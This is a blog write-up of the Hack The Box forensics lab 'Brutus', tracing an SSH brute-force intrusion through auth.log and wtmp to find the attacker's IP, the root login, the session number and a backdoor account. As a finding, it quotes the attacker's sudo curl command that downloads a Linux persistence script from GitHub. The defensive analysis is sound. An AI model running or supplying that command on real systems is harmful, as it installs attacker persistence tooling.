security portfolio + blog

by Nicholas Coleman

Download as .zip Download as .tar.gz View on GitHub
24 March 2025

Brutus

by Nicholas Coleman

Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?

In order to find the attacking IP address, the first thing to do would be to look for any signs of a brute force attack in the log file.

I navigated to the directory containing the auth.log file, and did a grep search for any “Failed password” errors.

failed password

Bingo! 65.2.161.68 is the IP address used by the brute force attacker. The amount of attempts is solid proof of a brute-force attack itself.

The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account?

Doing another grep to look for any signs of a successful attempt is the easiest thing to do here. Luckily, I was able to do so.

accepted password

The first time that 65.2.161.68 was able to succesfully login to the server was at 06:31:40, when they logged in as the root user.

Identify the timestamp when the attacker logged in manually to the server to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.

The first thing to do is look at the wtmp log using the utmpdump tool.

utmpdump

2024-03-06T06:32:45 is the timestamp when the attacking IP address first logs in manually.

SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

grep_root

From doing a grep search on the root user, I was able to see the first time that the password attempt was successful for the attacker was at 06:32:44.

The message: systemd-logind[411]: New session 37 of user root. indicates that the ssh login session for the attacker is 37.

The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

cyberjunkie.

What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account?

Looking at the Enterprise Matrix and then navigating to the Persistence tab, I was able to see the “Create Account” sub-technique.

create_account

The sub-ID for creating a new local account was T1136.001.

What time did the attacker’s first SSH session end according to auth.log?

Since we know that ssh session 37 belongs to the attacker, I did a grep search on session 37 and found out the session ended at 06:37:24.

session_end

The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

last_command

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh is the full command.

tags: hackthebox